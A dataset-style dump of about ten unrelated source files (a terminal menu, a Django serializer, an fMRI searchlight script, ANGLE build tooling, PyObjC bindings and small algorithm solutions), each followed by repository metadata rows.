        tokens.pop()  # drop the trailing newline so there is no blank last row
        return [('class:'+pygments_token_to_classname(x[0]), str(x[1])) for x in tokens]
    def get_selection(self):
        """Return the currently highlighted choice string."""
        return self.choices[self.selected_option_index]
ic = InquirerControl(choices)
def get_prompt_tokens():
    # Render the one-line prompt: '? Command Select' plus either the chosen
    # command (after answering) or the arrow-key hint.
    tokens = []
    T = Token
    tokens.append((Token.QuestionMark, '?'))
    tokens.append((Token.Question, string_query))
    if ic.answered:
        tokens.append((Token.Answer, ' ' + ic.get_selection()))
        # NOTE(review): running the selected command from inside this render
        # callback is a side effect; it fires whenever the prompt is redrawn
        # after answering — confirm this is intentional.
        selected_item(ic.get_selection())
    else:
        tokens.append((Token.Instruction, inst))
    return [('class:'+pygments_token_to_classname(x[0]), str(x[1])) for x in tokens]
# Two-row layout: a one-line prompt on top, the (hideable) choice list below.
HSContainer = HSplit([
    Window(height=D.exact(1),
           content=FormattedTextControl(get_prompt_tokens)),
    ConditionalContainer(
        Window(
            ic,
            width=D.exact(43),
            height=D(min=3),
            scroll_offsets=ScrollOffsets(top=1, bottom=1)
        ),
        # Hide the list once a choice has been made.
        filter=~IsDone())])
layout = Layout(HSContainer)
kb = KeyBindings()
@kb.add('c-q', eager=True)
@kb.add('c-c', eager=True)
def _(event):
    # Ctrl-Q / Ctrl-C: abort without choosing anything.
    event.app.exit(None)
@kb.add('down', eager=True)
def move_cursor_down(event):
    # Move the highlight down, wrapping past the last entry.
    ic.selected_option_index = (
        (ic.selected_option_index + 1) % ic.choice_count)
@kb.add('up', eager=True)
def move_cursor_up(event):
    # Move the highlight up, wrapping past the first entry.
    ic.selected_option_index = (
        (ic.selected_option_index - 1) % ic.choice_count)
@kb.add('enter', eager=True)
def set_answer(event):
    # Enter: confirm the highlighted choice and leave the application loop.
    ic.answered = True
    event.app.exit(None)
# Colors for the token classes used by the prompt and the choice list.
inquirer_style = style_from_pygments_dict({
    Token.QuestionMark: '#5F819D',
    Token.Selected: '#FF9D00',
    Token.Instruction: '',
    Token.Answer: '#FF9D00 bold',
    Token.Question: 'bold'
})
# Build and run the prompt application (keyboard only; mouse disabled).
app = Application(
    layout=layout,
    key_bindings=kb,
    mouse_support=False,
    style=inquirer_style
)
app.run()
| [
"6syun9@gmail.com"
] | 6syun9@gmail.com |
677e75005b39feb32f9b2e382f9ccb08f2840189 | c9b5ed2eb5d596f141004f7b82e79bc2fb36072d | /equipes/api/serializers.py | ac8cb9a5c81ec70d5e9358ed8f90924bad2664d4 | [] | no_license | jocsakesley/encontrocomcristo | 3fd670544a42abfc43f2c2d6a34c8e3fdd9d2550 | 8e9bbf41f6d80f2ac15fc4240ff4b108957d5cd6 | refs/heads/master | 2023-02-24T15:20:01.129002 | 2021-02-04T17:33:06 | 2021-02-04T17:33:06 | 330,020,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,535 | py | from rest_framework import serializers
from equipes.models import Equipe
from funcao.models import Funcao
from participantes.api.serializers import ParticipantesSerializer
from participantes.models import Participante
class EquipesSerializer(serializers.ModelSerializer):
    """Serializer for Equipe, nesting its leader and member participants."""
    lider = ParticipantesSerializer()
    membros = ParticipantesSerializer(many=True)
    class Meta:
        model = Equipe
        fields = "__all__"
    def cria_membros(self, membros, equipes):
        """Create (or reuse) each member Participante and attach it to *equipes*.

        membros: validated participant dicts, each with a nested 'funcao' dict.
        equipes: the Equipe instance the members are added to.
        """
        for membro in membros:
            # The nested 'funcao' dict must be resolved to a Funcao row before
            # the Participante itself can be looked up / created.
            funcao_data = membro.pop('funcao')
            funcao = Funcao.objects.get_or_create(**funcao_data)[0]
            membro['funcao'] = funcao
            participante = Participante.objects.get_or_create(**membro)[0]
            equipes.membros.add(participante)
    def create(self, validated_data):
        """Create an Equipe together with its nested leader and members.

        (Removed the stray debug prints and redundant dict copies from the
        original implementation; behavior is otherwise unchanged.)
        """
        # Detach the nested payloads before creating the Equipe itself.
        lider_data = dict(validated_data.pop('lider'))
        membros_data = validated_data.pop('membros')
        equipe = Equipe.objects.create(**validated_data)
        self.cria_membros(membros_data, equipe)
        # Resolve the leader's role, then the leader, reusing existing rows.
        funcao_data = dict(lider_data.pop('funcao'))
        funcao = Funcao.objects.get_or_create(**funcao_data)[0]
        lider_data['funcao'] = funcao
        equipe.lider = Participante.objects.get_or_create(**lider_data)[0]
        equipe.save()
        return equipe
#def update(self, instance, validated_data): | [
"jocsadm@gmail.com"
] | jocsadm@gmail.com |
700c728094234c49a378ee39c18548edcf4cdc70 | 6d960d2ac7cb38f3e2db21cf59c10b2a734fcf42 | /code/scripts/searchlight_movie_perms.py | 78220d4547a9214baf26589ec742393540bbda49 | [
"MIT"
] | permissive | physthoth/sherlock-topic-model-paper | 2d86a1581ffc8a5fca553656bb1ca67f73bf634c | 4f77750c436264585879efb9f91957dc555f36a9 | refs/heads/master | 2020-09-25T11:13:32.457422 | 2018-10-08T18:40:17 | 2018-10-08T18:40:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,578 | py | import sys
import numpy as np
from nilearn.image import load_img
from brainiak.searchlight.searchlight import Searchlight
import pandas as pd
subid = int(sys.argv[1])
perm = int(sys.argv[2])
# Seed on the permutation index so each permutation's random shift is reproducible.
np.random.seed(perm)
# load fmri data
data = load_img('/idata/cdl/data/fMRI/andy/sherlock/data/sherlock_movie_s%s_10000.nii.gz' % str(subid)).get_data()
# load dtw warp path and extract the movie path
#path = np.load('/idata/cdl/data/fMRI/andy/sherlock/data/s%s_dtw_path.npy' % str(subid))
#movie_path = np.array(list(map(lambda x: x[0], path)))
# reindex the fmri data with the movie path
#data = data[:,:,:, movie_path]
# create the mask
# Voxels whose first timepoint equals the 10000 fill value are excluded.
mask = data[:,:,:,0]!=10000
# load video model
model = np.load('/idata/cdl/data/fMRI/andy/sherlock/data/movie_corrmat.npy')
# shift the video model
# Random circular shift (>= 1 row) of the model builds the null permutation.
shift = np.random.randint(1, model.shape[0]-1)
shifted = np.roll(model, shift=shift, axis=0)
# recompute shifted correlation matrix
model = pd.DataFrame(shifted).T.corr().values
# Create searchlight object
params = dict(sl_rad=5)
sl = Searchlight(**params)
# Distribute data to processes
sl.distribute([data], mask)
sl.broadcast(model)
# Define voxel function
def sfn(l, msk, myrad, bcast_var):
    """Searchlight kernel: correlate the local timepoint-similarity structure
    with the broadcast model matrix.

    l: single-element list holding the 4-D bold array (x, y, z, t);
    msk: 3-D boolean mask selecting the sphere's voxels;
    bcast_var: the broadcast model correlation matrix.
    """
    # scipy is imported inside the kernel so each worker process resolves it.
    from scipy.spatial.distance import cdist
    from scipy.stats import pearsonr
    timepoint_patterns = l[0][msk, :].T
    # 1 - correlation distance between timepoint pairs == their correlation.
    neural_corrs = 1 - cdist(timepoint_patterns, timepoint_patterns, 'correlation').ravel()
    return pearsonr(neural_corrs, bcast_var.ravel())[0]
# Run searchlight
result = sl.run_searchlight(sfn)
# Persist the permutation map; subject, permutation and shift go in the name.
np.save('/idata/cdl/data/fMRI/andy/sherlock/analyses/searchlight_movie/perms/s%s_perm%s_shift%s' % (str(subid), str(perm), str(shift)), result)
| [
"andrew.heusser@gmail.com"
] | andrew.heusser@gmail.com |
c2d7cb06a8b114a948211b5dd7d2cfe7c0012b7d | 1925c535d439d2d47e27ace779f08be0b2a75750 | /bloomberg/same_tree.py | e61ffeb81f1564b400d34c9b10a77d2466f534f5 | [] | no_license | arthurDz/algorithm-studies | ee77d716041671c4b8bb757d8d96f3d10b6589f7 | 1e4d23dd0c40df34f58d71c7ca3e6491be732075 | refs/heads/master | 2023-04-27T12:17:06.209278 | 2021-04-30T20:16:18 | 2021-04-30T20:16:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | # Given two binary trees, write a function to check if they are the same or not.
# Two binary trees are considered the same if they are structurally identical and the nodes have the same value.
# Example 1:
# Input: 1 1
# / \ / \
# 2 3 2 3
# [1,2,3], [1,2,3]
# Output: true
# Example 2:
# Input: 1 1
# / \
# 2 2
# [1,2], [1,null,2]
# Output: false
# Example 3:
# Input: 1 1
# / \ / \
# 2 1 1 2
# [1,2,1], [1,1,2]
# Output: false
def isSameTree(self, p, q):
    """Return True when trees p and q are structurally identical and every
    corresponding pair of nodes holds the same value."""
    if p is None and q is None:
        return True
    if p is None or q is None or p.val != q.val:
        return False
    return self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)
| [
"yunfan.yang@minerva.kgi.edu"
] | yunfan.yang@minerva.kgi.edu |
dd52c60b639b8ff8d22bc8853e5f0b95231434bd | 3d07a6eb8cba4f6821c4a36c508e2f2cf1e407ee | /ps6/ps6_3.py | 33b87f81d5ed9f3b5be283898e4429c8d8dd00e6 | [] | no_license | claraqqqq/i_c_s_p_a_t_m_i_t | d4aaa9a176b698e8c402674de0a1bfe2d0e1e6ae | 3a0cae66fab7320a55ed3403b11c042bd347dcda | refs/heads/master | 2021-01-19T09:44:50.012962 | 2015-04-07T15:13:45 | 2015-04-07T15:13:45 | 29,719,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 759 | py | # ENCRYPTION
"""
strings. encode to them use to able be should you applyCoder, and buildCoder written have you Once
Cases Test
8) test.', a is applyShift('This >>>
bmab.' i qa 'Bpqa
18) bmab.', i qa applyShift('Bpqa >>>
test.' a is 'This
"""
def applyShift(text, shift):
    """
    Given a text, returns a new text Caesar shifted by the given shift
    offset. Lower case letters should remain lower case, upper case
    letters should remain upper case, and all other punctuation should
    stay as it is.
    text: string to apply the shift to
    shift: amount to shift the text (0 <= int < 26)
    returns: text after being shifted by specified amount.
    """
    ### TODO.
    ### HINT: This is a wrapper function.
    coder = buildCoder(shift)
    return applyCoder(text, coder)
| [
"claraqqqq@gmail.com"
] | claraqqqq@gmail.com |
a510e0648dd38fe7c0ec63582bf5a346f19838c2 | eeb469954b768095f2b8ad2376f1a114a3adb3fa | /961.py | 9ceaffbdf9802217725e20fd681051191aa438b9 | [
"MIT"
] | permissive | RafaelHuang87/Leet-Code-Practice | ef18dda633932e3cce479f7d5411552d43da0259 | 7754dcee38ffda18a5759113ef06d7becf4fe728 | refs/heads/master | 2020-07-18T20:09:10.311141 | 2020-02-11T09:56:39 | 2020-02-11T09:56:39 | 206,305,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | """
Solution for Leet Code 961.
"""
class Solution:
    def repeatedNTimes(A):
        """Return the first value that appears twice in A.

        For the LeetCode 961 input (2N elements where one value is repeated
        N times) this is the repeated element.  A set gives O(1) membership
        tests; the original dict stored counts it never read.
        """
        seen = set()
        for value in A:
            if value in seen:
                return value
            seen.add(value)
print(Solution.repeatedNTimes([1,3,2,1]))
"rafaelhuang@163.com"
] | rafaelhuang@163.com |
5388a6574e30e9d7340f6908a1a97e1f2eedf4c7 | da1721d2783ea4d67ff4e73cee6eee71292f2ef7 | /toontown/ai/DistributedSillyMeterMgr.py | a45f47422f60ca9ce436eee33a9023ca2d40d653 | [
"BSD-3-Clause"
] | permissive | open-toontown/open-toontown | bbdeb1b7bf0fb2861eba2df5483738c0112090ca | 464c2d45f60551c31397bd03561582804e760b4a | refs/heads/develop | 2023-07-07T01:34:31.959657 | 2023-05-30T23:49:10 | 2023-05-30T23:49:10 | 219,221,570 | 143 | 104 | BSD-3-Clause | 2023-09-11T09:52:34 | 2019-11-02T22:24:38 | Python | UTF-8 | Python | false | false | 2,339 | py | from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedObject
from toontown.ai import DistributedPhaseEventMgr
import time
class DistributedSillyMeterMgr(DistributedPhaseEventMgr.DistributedPhaseEventMgr):
    """Client-side manager for the Silly Meter event.

    Relays phase and running-state updates from the distributed object to the
    rest of the client through messenger events.
    """
    neverDisable = 1
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedSillyMeterMgr')

    def __init__(self, cr):
        DistributedPhaseEventMgr.DistributedPhaseEventMgr.__init__(self, cr)
        # Expose this manager on the client repository for easy lookup.
        cr.SillyMeterMgr = self

    def announceGenerate(self):
        DistributedPhaseEventMgr.DistributedPhaseEventMgr.announceGenerate(self)
        messenger.send('SillyMeterIsRunning', [self.isRunning])

    def delete(self):
        self.notify.debug('deleting SillyMetermgr')
        # The meter is going away, so tell listeners it is no longer running.
        messenger.send('SillyMeterIsRunning', [False])
        DistributedPhaseEventMgr.DistributedPhaseEventMgr.delete(self)
        if hasattr(self.cr, 'SillyMeterMgr'):
            del self.cr.SillyMeterMgr

    def setCurPhase(self, newPhase):
        DistributedPhaseEventMgr.DistributedPhaseEventMgr.setCurPhase(self, newPhase)
        messenger.send('SillyMeterPhase', [newPhase])

    def setIsRunning(self, isRunning):
        DistributedPhaseEventMgr.DistributedPhaseEventMgr.setIsRunning(self, isRunning)
        messenger.send('SillyMeterIsRunning', [isRunning])

    def getCurPhaseDuration(self):
        """Return the current phase's duration in seconds, or -1 when unknown.

        Reports an error (and returns -1) when the phase has no end date or
        the dates are out of order.
        """
        if len(self.holidayDates) > 0:
            startHolidayDate = self.holidayDates[self.curPhase]
            if self.curPhase + 1 >= len(self.holidayDates):
                # BUGFIX: the original used '... phase %' — an incomplete
                # printf conversion that raises ValueError when formatted.
                self.notify.error('No end date for phase %s' % self.curPhase)
                return -1
            else:
                endHolidayDate = self.holidayDates[self.curPhase + 1]
                startHolidayTime = time.mktime(startHolidayDate.timetuple())
                endHolidayTime = time.mktime(endHolidayDate.timetuple())
                holidayDuration = endHolidayTime - startHolidayTime
                if holidayDuration < 0:
                    # BUGFIX: same incomplete '%' conversion as above.
                    self.notify.error('Duration not set for phase %s' % self.curPhase)
                    return -1
                else:
                    return holidayDuration
        else:
            self.notify.warning('Phase dates not yet known')
            return -1

    def getCurPhaseStartDate(self):
        """Return the date the current phase started, or None if dates are unknown."""
        if len(self.holidayDates) > 0:
            return self.holidayDates[self.curPhase]
| [
"jwcotejr@gmail.com"
] | jwcotejr@gmail.com |
e46324e4c2af8516a88d6a572cc626d581a0d47e | 1a17167c38dc9a12c1f72dd0f3ae7288f5cd7da0 | /Source/ThirdParty/angle/scripts/export_targets.py | 47eb67c26cfd00c933217b50d08d641e42f9723d | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"Zlib",
"LicenseRef-scancode-khronos",
"BSL-1.0",
"BSD-2-Clause"
] | permissive | elix22/Urho3D | c57c7ecb58975f51fabb95bcc4330bc5b0812de7 | 99902ae2a867be0d6dbe4c575f9c8c318805ec64 | refs/heads/master | 2023-06-01T01:19:57.155566 | 2021-12-07T16:47:20 | 2021-12-07T17:46:58 | 165,504,739 | 21 | 4 | MIT | 2021-11-05T01:02:08 | 2019-01-13T12:51:17 | C++ | UTF-8 | Python | false | false | 9,240 | py | #! /usr/bin/env python3
assert __name__ == '__main__'
'''
To update ANGLE in Gecko, use Windows with git-bash, and setup depot_tools, python2, and
python3. Because depot_tools expects `python` to be `python2` (shame!), python2 must come
before python3 in your path.
Upstream: https://chromium.googlesource.com/angle/angle
Our repo: https://github.com/mozilla/angle
It has branches like 'firefox-60' which is the branch we use for pulling into
Gecko with this script.
This script leaves a record of the merge-base and cherry-picks that we pull into
Gecko. (gfx/angle/cherries.log)
ANGLE<->Chrome version mappings are here: https://omahaproxy.appspot.com/
An easy choice is to grab Chrome's Beta's ANGLE branch.
## Usage
Prepare your env:
~~~
export PATH="$PATH:/path/to/depot_tools"
~~~
If this is a new repo, don't forget:
~~~
# In the angle repo:
./scripts/bootstrap.py
gclient sync
~~~
Update: (in the angle repo)
~~~
# In the angle repo:
/path/to/gecko/gfx/angle/update-angle.py origin/chromium/XXXX
git push moz # Push the firefox-XX branch to github.com/mozilla/angle
~~~~
'''
import json
import os
import pathlib
import re
import shutil
import subprocess
import sys
from typing import * # mypy annotations
REPO_DIR = pathlib.Path.cwd()
GN_ENV = dict(os.environ)
# We need to set DEPOT_TOOLS_WIN_TOOLCHAIN to 0 for non-Googlers, but otherwise
# leave it unset since vs_toolchain.py assumes that the user is a Googler with
# the Visual Studio files in depot_tools if DEPOT_TOOLS_WIN_TOOLCHAIN is not
# explicitly set to 0.
vs_found = False
for directory in os.environ['PATH'].split(os.pathsep):
    vs_dir = os.path.join(directory, 'win_toolchain', 'vs_files')
    if os.path.exists(vs_dir):
        vs_found = True
        break
if not vs_found:
    GN_ENV['DEPOT_TOOLS_WIN_TOOLCHAIN'] = '0'
# First CLI argument is the GN out dir; the rest are root targets to export.
(OUT_DIR, *ROOTS) = sys.argv[1:]
assert len(ROOTS), 'Usage: export_targets.py OUT_DIR ROOTS...'
for x in ROOTS:
    assert x.startswith('//:')
# ------------------------------------------------------------------------------
def run_checked(*args, **kwargs):
    """Echo the command to stderr, run it, and raise on a non-zero exit."""
    print(' ', args, file=sys.stderr)
    sys.stderr.flush()
    return subprocess.run(args, check=True, **kwargs)
def sortedi(x):
    """Return *x* sorted case-insensitively (stable)."""
    return sorted(x, key=lambda item: item.lower())
def dag_traverse(root_keys: Sequence[str], pre_recurse_func: Callable[[str], list]):
    """Depth-first walk over a DAG of string keys, visiting each key once.

    pre_recurse_func(key) returns either (child_keys,) or
    (child_keys, post_recurse_func); the optional post function runs after
    all of the key's children have been processed.
    """
    seen: Set[str] = set()
    def walk(key):
        if key in seen:
            return
        seen.add(key)
        result = pre_recurse_func(key)
        try:
            (children, after) = result
        except ValueError:
            # Single-element tuple: no post-recursion callback supplied.
            (children,) = result
            after = None
        for child in children:
            walk(child)
        if after:
            after(key)
        return
    for root in root_keys:
        walk(root)
    return
# ------------------------------------------------------------------------------
print('Importing graph', file=sys.stderr)
try:
    # Ask gn for a JSON description of every target in the out dir.
    p = run_checked('gn', 'desc', '--format=json', str(OUT_DIR), '*', stdout=subprocess.PIPE,
                    env=GN_ENV, shell=(True if sys.platform == 'win32' else False))
except subprocess.CalledProcessError:
    sys.stderr.buffer.write(b'`gn` failed. Is depot_tools in your PATH?\n')
    exit(1)
# -
print('\nProcessing graph', file=sys.stderr)
descs = json.loads(p.stdout.decode())
# Ready to traverse
# ------------------------------------------------------------------------------
LIBRARY_TYPES = ('shared_library', 'static_library')
def flattened_target(target_name: str, descs: dict, stop_at_lib: bool =True) -> dict:
    # Merge the target's GN description with those of its transitive deps.
    # List-valued fields (sources, defines, ...) are unioned and sorted
    # case-insensitively; scalar fields keep the root target's value.  With
    # stop_at_lib, traversal does not descend into other libraries.
    flattened = dict(descs[target_name])
    EXPECTED_TYPES = LIBRARY_TYPES + ('source_set', 'group', 'action')
    def pre(k):
        dep = descs[k]
        dep_type = dep['type']
        deps = dep['deps']
        if stop_at_lib and dep_type in LIBRARY_TYPES:
            return ((),)
        if dep_type == 'copy':
            assert not deps, (target_name, dep['deps'])
        else:
            assert dep_type in EXPECTED_TYPES, (k, dep_type)
        # NOTE: this loop rebinds k from the dep's name to each field name.
        for (k,v) in dep.items():
            if type(v) in (list, tuple, set):
                flattened[k] = sortedi(set(flattened.get(k, []) + v))
            else:
                #flattened.setdefault(k, v)
                pass
        return (deps,)
    dag_traverse(descs[target_name]['deps'], pre)
    return flattened
# ------------------------------------------------------------------------------
# Check that includes are valid. (gn's version of this check doesn't seem to work!)
# Matches a quoted or angle-bracket #include at line start; group 1 is the
# opening delimiter, group 2 the header path.
INCLUDE_REGEX = re.compile(b'(?:^|\\n) *# *include +([<"])([^>"]+)[>"]')
assert INCLUDE_REGEX.match(b'#include "foo"')
assert INCLUDE_REGEX.match(b'\n#include "foo"')
# Most of these are ignored because this script does not currently handle
# #includes in #ifdefs properly, so they will erroneously be marked as being
# included, but not part of the source list.
IGNORED_INCLUDES = {
    b'compiler/translator/TranslatorESSL.h',
    b'compiler/translator/TranslatorGLSL.h',
    b'compiler/translator/TranslatorHLSL.h',
    b'compiler/translator/TranslatorMetal.h',
    b'compiler/translator/TranslatorVulkan.h',
    b'libANGLE/renderer/d3d/DeviceD3D.h',
    b'libANGLE/renderer/d3d/DisplayD3D.h',
    b'libANGLE/renderer/d3d/RenderTargetD3D.h',
    b'libANGLE/renderer/d3d/d3d11/winrt/NativeWindow11WinRT.h',
    b'libANGLE/renderer/gl/glx/DisplayGLX.h',
    b'libANGLE/renderer/gl/cgl/DisplayCGL.h',
    b'libANGLE/renderer/gl/egl/ozone/DisplayOzone.h',
    b'libANGLE/renderer/gl/egl/android/DisplayAndroid.h',
    b'libANGLE/renderer/gl/wgl/DisplayWGL.h',
    b'libANGLE/renderer/metal/DisplayMtl_api.h',
    b'libANGLE/renderer/null/DisplayNULL.h',
    b'libANGLE/renderer/vulkan/android/DisplayVkAndroid.h',
    b'libANGLE/renderer/vulkan/fuchsia/DisplayVkFuchsia.h',
    b'libANGLE/renderer/vulkan/win32/DisplayVkWin32.h',
    b'libANGLE/renderer/vulkan/xcb/DisplayVkXcb.h',
    b'kernel/image.h',
}
# System/framework-style include prefixes that never map to in-tree sources.
IGNORED_INCLUDE_PREFIXES = {
    b'android',
    b'Carbon',
    b'CoreFoundation',
    b'CoreServices',
    b'IOSurface',
    b'mach',
    b'mach-o',
    b'OpenGL',
    b'pci',
    b'sys',
    b'wrl',
    b'X11',
}
# Vendored third-party targets are exempt from the include check entirely.
IGNORED_DIRECTORIES = {
    '//third_party/glslang',
    '//third_party/spirv-tools',
    '//third_party/SwiftShader',
    '//third_party/vulkan-headers',
    '//third_party/vulkan-loader',
    '//third_party/vulkan-tools',
    '//third_party/vulkan-validation-layers',
}
def has_all_includes(target_name: str, descs: dict) -> bool:
    # Verify that every quoted #include in the target's sources resolves to a
    # file in its flattened sources/outputs.  Known-bad cases (ifdef'd headers,
    # system-style prefixes, vendored third-party dirs) are skipped.  Warns on
    # stderr and returns False for unknown includes.
    for ignored_directory in IGNORED_DIRECTORIES:
        if target_name.startswith(ignored_directory):
            return True
    flat = flattened_target(target_name, descs, stop_at_lib=False)
    acceptable_sources = flat.get('sources', []) + flat.get('outputs', [])
    acceptable_sources = {x.rsplit('/', 1)[-1].encode() for x in acceptable_sources}
    ret = True
    desc = descs[target_name]
    for cur_file in desc.get('sources', []):
        assert cur_file.startswith('/'), cur_file
        if not cur_file.startswith('//'):
            # Not a source-tree path; nothing to read.
            continue
        cur_file = pathlib.Path(cur_file[2:])
        text = cur_file.read_bytes()
        for m in INCLUDE_REGEX.finditer(text):
            if m.group(1) == b'<':
                # Angle-bracket includes are system headers; ignore.
                continue
            include = m.group(2)
            if include in IGNORED_INCLUDES:
                continue
            try:
                (prefix, _) = include.split(b'/', 1)
                if prefix in IGNORED_INCLUDE_PREFIXES:
                    continue
            except ValueError:
                pass
            # Compare by basename only, since include paths and GN source
            # paths are rooted differently.
            include_file = include.rsplit(b'/', 1)[-1]
            if include_file not in acceptable_sources:
                #print('  acceptable_sources:')
                #for x in sorted(acceptable_sources):
                #    print('    ', x)
                print('Warning in {}: {}: Invalid include: {}'.format(target_name, cur_file, include), file=sys.stderr)
                ret = False
            #print('Looks valid:', m.group())
            continue
    return ret
# -
# Gather real targets:
def gather_libraries(roots: Sequence[str], descs: dict) -> Set[str]:
    """Walk the dependency graph from *roots*, validating includes along the
    way, and collect the names of all reachable library targets."""
    libraries = set()
    def visit(target_name):
        desc = descs[target_name]
        print(' ' + desc['type'], target_name, file=sys.stderr)
        assert has_all_includes(target_name, descs), target_name
        if desc['type'] in ('shared_library', 'static_library'):
            libraries.add(target_name)
        return (desc['deps'], )
    dag_traverse(roots, visit)
    return libraries
# -
libraries = gather_libraries(ROOTS, descs)
# Progress report goes to stderr so stdout stays clean JSON.
print(f'\n{len(libraries)} libraries:', file=sys.stderr)
for k in libraries:
    print(f' {k}', file=sys.stderr)
print('\nstdout begins:', file=sys.stderr)
sys.stderr.flush()
# ------------------------------------------------------------------------------
# Output
out = {k: flattened_target(k, descs) for k in libraries}
for (k,desc) in out.items():
    # Reduce each library's deps to just the libraries it links against,
    # stripping the leading '//:' from their GN labels.
    dep_libs: Set[str] = set()
    for dep_name in set(desc['deps']):
        dep = descs[dep_name]
        if dep['type'] in LIBRARY_TYPES:
            dep_libs.add(dep_name[3:])
    desc['deps'] = sortedi(dep_libs)
json.dump(out, sys.stdout, indent=' ')
exit(0)
| [
"elix22@gmail.com"
] | elix22@gmail.com |
ede1040ed424de83ddae76fb583b84076606c140 | 5002d20adbd983963f71ceb0bfaea148b1cbc079 | /CSE/CSE Major Projects - 2017_21/Politeness Transfer_ A Tag and Generate Approach/code/be-af.py | e316ef98b46f41f7fb3320e27fd4b00cebb5e039 | [] | no_license | 19WH1A0578/BVRITHYDERABAD | d15863ab255837bc11e49ff0742f6d6ab32c2c28 | 2492f5bd0eebf9103566a0cc7f96d732407c4317 | refs/heads/main | 2023-07-03T01:46:12.654932 | 2021-07-31T07:09:54 | 2021-07-31T07:09:54 | 384,429,090 | 1 | 0 | null | 2021-07-09T12:23:28 | 2021-07-09T12:23:28 | null | UTF-8 | Python | false | false | 1,082 | py | # -*- coding: utf-8 -*-
import pandas as pd
import os
from convokit import Corpus, Utterance, Speaker
from convokit import PolitenessStrategies
# Load the training split as a ConvoKit corpus.
train_corpus = Corpus(filename=("data/train/training-corpus/"))
ps = PolitenessStrategies(strategy_attribute_name = "strategies", \
                          marker_attribute_name = "markers", \
                          strategy_collection="politeness_local")
# it is important to set markers to True
train_corpus = ps.transform(train_corpus, markers=True)
# Sanity check: each utterance's labelled strategy was actually detected.
for utt in train_corpus.iter_utterances():
    strategy_split = utt.meta['strategy']
    assert utt.meta['strategies'][strategy_split] == 1
# helper functions further detailed in Marker_Edits.ipynb
from strategy_manipulation import remove_strategies_from_utt
# Strip the labelled strategy's markers from every utterance.
for utt in train_corpus.iter_utterances():
    remove_strategies_from_utt(utt, [utt.meta['strategy']])
# Spot-check one utterance before/after; alternative ids kept for reference.
utt = train_corpus.get_utterance('100087711.41.31')
# 100087711.41.31
# 10387534.0.0
# 105319599.26773.0
print("BEFORE:", utt.text)
print("AFTER:", utt.meta)
| [
"saisudhavadisina@gmail.com"
] | saisudhavadisina@gmail.com |
660d20122ec3c754f92aa8e51fb1153f3787c410 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02901/s827366183.py | e8d52e3e5d9a72d4e8c404ef73945cacb67be0a1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | INF = 2*10**7
def main():
    """Read the key/box puzzle from stdin and print the minimum total cost of
    a key set that opens every treasure box, or -1 when impossible."""
    n_boxes, n_keys = (int(tok) for tok in input().split())
    costs = []
    key_masks = []
    for _ in range(n_keys):
        cost, _box_count = (int(tok) for tok in input().split())
        costs.append(cost)
        mask = 0
        for box in input().split():
            mask |= 1 << (int(box) - 1)
        key_masks.append(mask)
    n_states = 1 << n_boxes
    # dp[k][s]: cheapest cost to open exactly the box set s with the first k keys.
    dp = [[INF] * n_states for _ in range(n_keys + 1)]
    dp[0][0] = 0
    for k in range(n_keys):
        for state in range(n_states):
            # Option 1: skip key k.
            if dp[k][state] < dp[k + 1][state]:
                dp[k + 1][state] = dp[k][state]
            # Option 2: buy key k and open the boxes in its mask.
            if dp[k][state] != INF:
                opened = state | key_masks[k]
                cheaper = dp[k][state] + costs[k]
                if cheaper < dp[k + 1][opened]:
                    dp[k + 1][opened] = cheaper
    answer = dp[n_keys][n_states - 1]
    print(-1 if answer == INF else answer)
if __name__ == '__main__':
    main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d63665e90489f68f80177c8430c39c23d6a03832 | f80ef3a3cf859b13e8af8433af549b6b1043bf6e | /pyobjc-framework-SystemConfiguration/Lib/SystemConfiguration/__init__.py | cf487eb2587ebcfb8bbfd19031f0c22d49f7614c | [
"MIT"
] | permissive | ronaldoussoren/pyobjc | 29dc9ca0af838a56105a9ddd62fb38ec415f0b86 | 77b98382e52818690449111cd2e23cd469b53cf5 | refs/heads/master | 2023-09-01T05:15:21.814504 | 2023-06-13T20:00:17 | 2023-06-13T20:00:17 | 243,933,900 | 439 | 49 | null | 2023-06-25T02:49:07 | 2020-02-29T08:43:12 | Python | UTF-8 | Python | false | false | 993 | py | """
Python mapping for the SystemConfiguration framework.
This module does not contain docstrings for the wrapped code, check Apple's
documentation for details on how to use these functions and classes.
"""
import sys
import Foundation
import objc
from SystemConfiguration import _metadata
sys.modules["SystemConfiguration"] = mod = objc.ObjCLazyModule(
"SystemConfiguration",
"com.apple.SystemConfiguration",
objc.pathForFramework("/System/Library/Frameworks/SystemConfiguration.framework"),
_metadata.__dict__,
None,
{
"__doc__": __doc__,
"__path__": __path__,
"__loader__": globals().get("__loader__", None),
"objc": objc,
},
(Foundation,),
)
del sys.modules["SystemConfiguration._metadata"]
import SystemConfiguration._manual as m # isort:skip # noqa: E402
for nm in dir(m):
setattr(mod, nm, getattr(m, nm))
mod.SCBondInterfaceRef = mod.SCNetworkInterfaceRef
mod.SCVLANInterfaceRef = mod.SCNetworkInterfaceRef
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
